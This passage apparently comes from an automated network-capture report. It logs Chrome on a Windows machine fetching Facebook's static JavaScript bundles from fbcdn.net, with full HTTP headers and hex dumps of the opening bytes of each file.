                                                                                                                                                                                                                                  61192.168.2.649787157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC374OUTGET /rsrc.php/v3/yg/r/5VtnQAqNe99.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1932INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: pvgShi+mxFj+MB0MDiof2A==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 03:37:04 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: M4F4zSdsEKoHuomFAr90kSYmbwpfZW7RvYrZbl1NpTxpLVSirUr0UGZ6/J8bElPa8JHfxn7Qv5Exz30o/PlfcA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:21 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=103, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=4, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 176168
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC15870INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3a 22 61 76 22 2c 45 4e 43 52 59 50 54 45 44 5f 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3a 22 65 61 76 22 7d 29 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 4c 6f 67 67 65 72 22 2c 5b 22 63 72 3a 39 39 38 39 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 72 65 74 75 72 6e 7b 6c 6f 67 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 62
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("ActorURIConfig",[],(function(a,b,c,d,e,f){a=Object.freeze({PARAMETER_ACTOR:"av",ENCRYPTED_PARAMETER_ACTOR:"eav"});f["default"]=a}),66);__d("BanzaiLogger",["cr:9989"],(function(a,b,c,d,e,f,g){function h(a){return{log:function(c,d){b
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 22 64 69 73 61 62 6c 65 64 2d 69 63 6f 6e 22 3a 22 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 22 64 69 73 61 62 6c 65 64 2d 74 65 78 74 22 3a 22 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 64 69 76 69 64 65 72 3a 22 23 33 45 34 30 34 32 22 2c 22 65 76 65 6e 74 2d 64 61 74 65 22 3a 22 23 46 33 34 32 35 46 22 2c 22 66 62 2d 77 6f 72 64 6d 61 72 6b 22 3a 22 23 46 46 46 46 46 46 22 2c 22 66 62 2d 6c 6f 67 6f 22 3a 22 23 30 38 36 36 46 46 22 2c 22 66 69 6c 74 65 72 2d 61 63 63 65 6e 74 22 3a 22 69 6e 76 65 72 74 28 34 30 25 29 20 73 65 70 69 61 28 35 32 25 29 20 73 61 74 75 72 61 74 65 28 32 30 30 25 29 20 73 61 74 75 72 61
                                                                                                                                                                                                                                  Data Ascii: a(255, 255, 255, 0.3)","disabled-icon":"rgba(255, 255, 255, 0.3)","disabled-text":"rgba(255, 255, 255, 0.3)",divider:"#3E4042","event-date":"#F3425F","fb-wordmark":"#FFFFFF","fb-logo":"#0866FF","filter-accent":"invert(40%) sepia(52%) saturate(200%) satura
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 65 6e 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 32 37 2c 32 35 30 2c 32 32 34 29 22 2c 22 67 72 65 65 6e 2d 74 65 72 74 69 61 72 79 22 3a 22 72 67 62 28 32 36 2c 36 38 2c 32 37 29 22 2c 22 6d 61 67 65 6e 74 61 2d 70 72 69 6d 61 72 79 22 3a 22 72 67 62 28 32 31 35 2c 37 37 2c 32 30 34 29 22 2c 22 6d 61 67 65 6e 74 61 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 35 35 2c 32 33 39 2c 32 35 34 29 22 2c 22 6d 61 67 65 6e 74 61 2d 74 65 72 74 69 61 72 79 22 3a 22 72 67 62 28 39 36 2c 33 36 2c 39 31 29 22 2c 22 6f 72 61 6e 67 65 2d 70 72 69 6d 61 72 79 22 3a 22 72 67 62 28 32 30 38 2c 31 30 38 2c 32 30 29 22 2c 22 6f 72 61 6e 67 65 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 35 35 2c 32 34 31 2c 32 33 39 29 22 2c 22 6f 72 61 6e 67
                                                                                                                                                                                                                                  Data Ascii: en-secondary":"rgb(227,250,224)","green-tertiary":"rgb(26,68,27)","magenta-primary":"rgb(215,77,204)","magenta-secondary":"rgb(255,239,254)","magenta-tertiary":"rgb(96,36,91)","orange-primary":"rgb(208,108,20)","orange-secondary":"rgb(255,241,239)","orang
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 2c 20 30 2c 20 30 2e 31 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 70 61 73 73 69 76 65 2d 6d 6f 76 65 2d 6f 75 74 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 2c 20 30 2c 20 30 2e 31 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 71 75 69 63 6b 2d 6d 6f 76 65 2d 69 6e 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 2c 20 30 2e 39 2c 20 30 2e 32 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 71 75 69 63 6b 2d 6d 6f 76 65 2d 6f 75 74 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 2c 20 30 2e 39 2c 20 30 2e 32 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 61 64 65 2d 69 6e 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65
                                                                                                                                                                                                                                  Data Ascii: bic-bezier(0.5, 0, 0.1, 1)","fds-animation-passive-move-out":"cubic-bezier(0.5, 0, 0.1, 1)","fds-animation-quick-move-in":"cubic-bezier(0.1, 0.9, 0.2, 1)","fds-animation-quick-move-out":"cubic-bezier(0.1, 0.9, 0.2, 1)","fds-animation-fade-in":"cubic-bezie
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1500INData Raw: 6e 63 65 28 29 3d 3d 3d 33 29 72 65 74 75 72 6e 21 30 3b 65 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 69 66 28 66 2e 74 72 69 67 67 65 72 4f 6e 52 65 70 65 61 74 73 3d 3d 3d 21 31 26 26 62 2e 72 65 70 65 61 74 3d 3d 3d 21 30 29 72 65 74 75 72 6e 21 31 3b 69 66 28 65 21 3d 6e 75 6c 6c 29 7b 69 66 28 66 2e 63 6f 6d 6d 61 6e 64 21 3d 6e 75 6c 6c 26 26 73 28 62 2e 74 61 72 67 65 74 2c 66 29 26 26 67 2e 67 65 74 4d 6f 64 69 66 69 65 64 4b 65 79 62 6f 61 72 64 53 68 6f 72 74 63 75 74 73 50 72 65 66 65 72 65 6e 63 65 28 29 3d 3d 3d 34 29 7b 77 2e 63 75 72 72 65 6e 74 28 66 2e 63 6f 6d 6d 61 6e 64 2c 66 2e 73 69 6e 67 6c 65 43 68 61 72 44 65 73 63 72 69 70 74 69 6f 6e 29 3b 72 65 74 75 72 6e 21 30 7d 68 3d 67 26 26 67 2e 67 65 74 41 72 65 53
                                                                                                                                                                                                                                  Data Ascii: nce()===3)return!0;e&&b.preventDefault()}if(f.triggerOnRepeats===!1&&b.repeat===!0)return!1;if(e!=null){if(f.command!=null&&s(b.target,f)&&g.getModifiedKeyboardShortcutsPreference()===4){w.current(f.command,f.singleCharDescription);return!0}h=g&&g.getAreS
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC14884INData Raw: 43 6f 6d 6d 61 6e 64 43 6f 6e 74 65 78 74 22 29 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 7a 2c 63 68 69 6c 64 72 65 6e 3a 42 7d 29 7d 64 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 64 2e 6e 61 6d 65 2b 22 20 5b 66 72 6f 6d 20 22 2b 66 2e 69 64 2b 22 5d 22 3b 72 65 74 75 72 6e 20 64 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 63 72 65 61 74 65 4b 65 79 43 6f 6d 6d 61 6e 64 57 69 64 67 65 74 22 2c 5b 22 63 72 65 61 74 65 4b 65 79 43 6f 6d 6d 61 6e 64 57 72 61 70 70 65 72 22 2c 22 72 65 61 63 74 22 2c 22 72 65 63 6f 76 65 72 61 62 6c 65 56 69 6f 6c 61 74 69 6f 6e 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 68 7c
                                                                                                                                                                                                                                  Data Ascii: CommandContext").Provider,{value:z,children:B})}d.displayName=d.name+" [from "+f.id+"]";return d}g["default"]=a}),98);__d("createKeyCommandWidget",["createKeyCommandWrapper","react","recoverableViolation"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h|
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 26 28 69 7c 7c 28 69 3d 63 28 22 73 75 73 70 65 6e 64 4f 72 54 68 72 6f 77 49 66 55 73 65 64 49 6e 53 53 52 22 29 29 29 28 22 4c 6f 61 64 69 6e 67 20 6f 66 20 62 6f 6f 74 6c 6f 61 64 65 64 20 61 6e 64 20 54 33 20 63 6f 6d 70 6f 6e 65 6e 74 73 20 69 73 20 64 69 73 61 62 6c 65 64 20 64 75 72 69 6e 67 20 53 53 52 22 29 3b 76 61 72 20 64 3d 62 2e 67 65 74 4d 6f 64 75 6c 65 49 64 28 29 3b 69 66 28 21 6a 5b 64 5d 29 7b 62 3d 6a 5b 64 5d 3d 62 2e 6c 6f 61 64 28 29 3b 62 5b 22 66 69 6e 61 6c 6c 79 22 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6a 5b 64 5d 7d 29 7d 74 68 72 6f 77 20 6a 5b 64 5d 7d 72 65 74 75 72 6e 20 61 7d 67 2e 70 72 65 6c 6f 61 64 3d 61 3b 67 2e 72 65 61 64 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 43 50 55 50 72 65 73 73 75
                                                                                                                                                                                                                                  Data Ascii: &(i||(i=c("suspendOrThrowIfUsedInSSR")))("Loading of bootloaded and T3 components is disabled during SSR");var d=b.getModuleId();if(!j[d]){b=j[d]=b.load();b["finally"](function(){delete j[d]})}throw j[d]}return a}g.preload=a;g.read=b}),98);__d("CPUPressu
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 3b 0a 5f 5f 64 28 22 4d 65 6d 6f 72 79 55 74 69 6c 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 65 6d 6f 72 79 7d 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 26 26 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 64 65 76 69 63 65 4d 65 6d 6f 72 79 7d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61
                                                                                                                                                                                                                                  Data Ascii: ;__d("MemoryUtils",[],(function(a,b,c,d,e,f){"use strict";function g(){return window.performance&&window.performance.memory}function h(){return window.navigator&&window.navigator.deviceMemory}function a(){return window.performance&&typeof window.performa
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC14884INData Raw: 6c 6c 26 26 28 63 28 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 22 29 28 6c 29 2c 6c 3d 6e 75 6c 6c 29 2c 6d 28 61 2c 62 29 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 2c 62 29 7b 69 66 28 21 64 28 22 56 69 73 69 62 69 6c 69 74 79 41 50 49 22 29 2e 69 73 56 69 73 69 62 69 6c 69 74 79 48 69 64 64 65 6e 28 29 26 26 6f 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 6f 3b 62 26 26 28 6b 3d 7b 61 66 66 65 63 74 65 64 49 6e 74 65 72 61 63 74 69 6f 6e 73 3a 5b 5d 2c 6d 65 74 72 69 63 73 3a 63 28 22 4f 6e 65 54 72 61 63 65 43 6f 72 65 22 29 2e 73 74 61 72 74 54 72 61 63 65 28 63 28 22 75 75 69 64 76 34 22 29 28 29 2c 61 2c 22 52 45 53 50 4f 4e 53 49 56 45 4e 45 53 53 22 2c 63 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 4e 6f 77 53 69 6e 63 65 41
                                                                                                                                                                                                                                  Data Ascii: ll&&(c("clearInterval")(l),l=null),m(a,b)}function q(a,b){if(!d("VisibilityAPI").isVisibilityHidden()&&o){var e=function(){var b=o;b&&(k={affectedInteractions:[],metrics:c("OneTraceCore").startTrace(c("uuidv4")(),a,"RESPONSIVENESS",c("performanceNowSinceA


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  62192.168.2.649791157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC581OUTGET /rsrc.php/v3/yr/r/jJPH6iCu1HH.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: UCXVUk0oqmh5pfZQTG8VQA==
                                                                                                                                                                                                                                  Expires: Tue, 23 Sep 2025 18:22:43 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: tH14bLqq+U8KwPVaJgGGo4jVWt5rdc0aQKIij+K8naVo8Eg9IpN0hgqGEFcTnisaI6pm1Rzdwtpw3oynpuyuRQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:21 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 1854
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1853INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 53 75 62 73 63 72 69 70 74 69 6f 6e 73 48 61 6e 64 6c 65 72 22 2c 5b 22 69 6e 76 61 72 69 61 6e 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 6d 6f 76 65 7c 7c 61 2e 72 65 73 65 74 7c 7c 61 2e 75 6e 73 75 62 73 63 72 69 62 65 7c 7c 61 2e 63 61 6e 63 65 6c 7c 7c 61 2e 64 69 73 70 6f 73 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 61 29 7b 69 28 61 29 2e 63 61 6c 6c 28 61 29 7d 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 24 31 3d 5b 5d 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("SubscriptionsHandler",["invariant"],(function(a,b,c,d,e,f,g,h){"use strict";function i(a){return a.remove||a.reset||a.unsubscribe||a.cancel||a.dispose}function j(a){i(a).call(a)}a=function(){function a(){this.$1=[]}var b=a.prototype


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  63192.168.2.649793157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC374OUTGET /rsrc.php/v3/yK/r/lNInKxOqejp.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: dPGOafzutFE7nyQyK+c4bg==
                                                                                                                                                                                                                                  Expires: Thu, 18 Sep 2025 17:55:51 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: DYQTshcOa5gOex58iuFPLI2XNL/hq4npMf6qY+p4H15TqgNSqMTx1SJMUuczHZkHidLHwJ6r90AUZqsCHmndQw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:21 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 10408
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC10407INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 56 39 76 64 59 43 6f 6c 63 34 6b 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 72 65 61 63 74 2d 30 2e 30 2e 30 22 2c 5b 22 52 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 22 64 65 66 61 75 6c 74 22 69 6e 20 61 3f 61 5b 22 64 65 66 61 75 6c 74 22 5d 3a 61 7d 76 61 72 20 67 3d 61 28 62 28 22 52 65 61 63 74 22 29 29 3b 64 3d 7b 7d 3b 76 61
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/V9vdYColc4k/ */__d("react-0.0.0",["React"],(function(a,b,c,d,e,f){"use strict";function a(a){return a&&typeof a==="object"&&"default"in a?a["default"]:a}var g=a(b("React"));d={};va


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  64192.168.2.649792157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC374OUTGET /rsrc.php/v3/y8/r/fCWCnWQldVh.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
